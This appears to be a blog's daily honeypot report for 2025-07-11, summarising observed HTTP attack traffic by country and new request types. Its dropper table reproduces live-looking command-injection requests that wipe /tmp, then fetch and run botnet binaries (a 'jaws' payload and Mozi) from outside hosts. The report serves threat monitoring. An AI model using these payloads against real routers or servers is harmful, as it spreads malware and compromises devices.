Skip to main content
  1. Daily-Posts/

Report: 2025-07-11

·371 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-07-11
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 7 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 17 new requests that have never been observed before (these were added to the monitored request database.).

A total of 647 requests were recorded during the day, originating from 7 different countries, with a peak of 268 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
HKGermany
KRGermany
USGermany
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
8.222.184.84GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.222.204.59GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.222.230.103GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.216.86.134GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
42.238.140.204GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://42.238.140.204:54256/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
47.236.41.26GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
120.48.4.132GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
622GET /webshell.asp HTTP/1.1
791GET /odinhttpcall1752192494 HTTP/1.1
801GET /Odin/http/call1752192494 HTTP/1.1
821GET /OdinHttpCall1752192494 HTTP/1.1
971POST /HNAP1/ HTTP/1.1
1101\x00\x0E8\x98\x1F\x8F\x90\xF6\xB3&\xAC\x00\x00\x00\x00\x00
1111\x00\x0E\x08\x98\x1F\x8F\x90\xF6\xB3&\xAC\x00\x00\x00\x00\x00
1221GET /webshell.aspx HTTP/1.1
1391GET /odinhttpcall1752226756 HTTP/1.1
1401GET /OdinHttpCall1752226756 HTTP/1.1
1411GET /Odin/http/call1752226756 HTTP/1.1
1511\x00\x0E\x08’\xA2\x0F\xBA7\xA1\xEDv\x00\x00\x00\x00\x00
1521\x00\x0E8’\xA2\x0F\xBA7\xA1\xEDv\x00\x00\x00\x00\x00
1571\x00\x0E\x08\xB0l\x18\xA7\x0F<pP\x00\x00\x00\x00\x00
1581\x00\x0E8\xB0l\x18\xA7\x0F<pP\x00\x00\x00\x00\x00
1591\x00\x0E\x08\xAC?\xCB\xCC
1601\x00\x0E8\xAC?\xCB\xCC

country_iso_code
#

number_of_occurencecountry_iso_code
0268US
189DE
249IN
325GB
424UA
522BG
621NL
718JP
813PL
911SG
1010DO
1110CN
128PT
137BE
146HU
156ZA
166TR
175SC
185GH
195MU
204IL
214BR
224RO
234CA
244AO
253RU
262HK
272IE
282VN
292SE
302KR
312KZ
321MM
331ES
341IR
351FR

Related

Report: 2025-07-10
·326 words
Repport Daily
Report: 2025-07-09
·338 words
Repport Daily
Report: 2025-07-08
·431 words
Repport Daily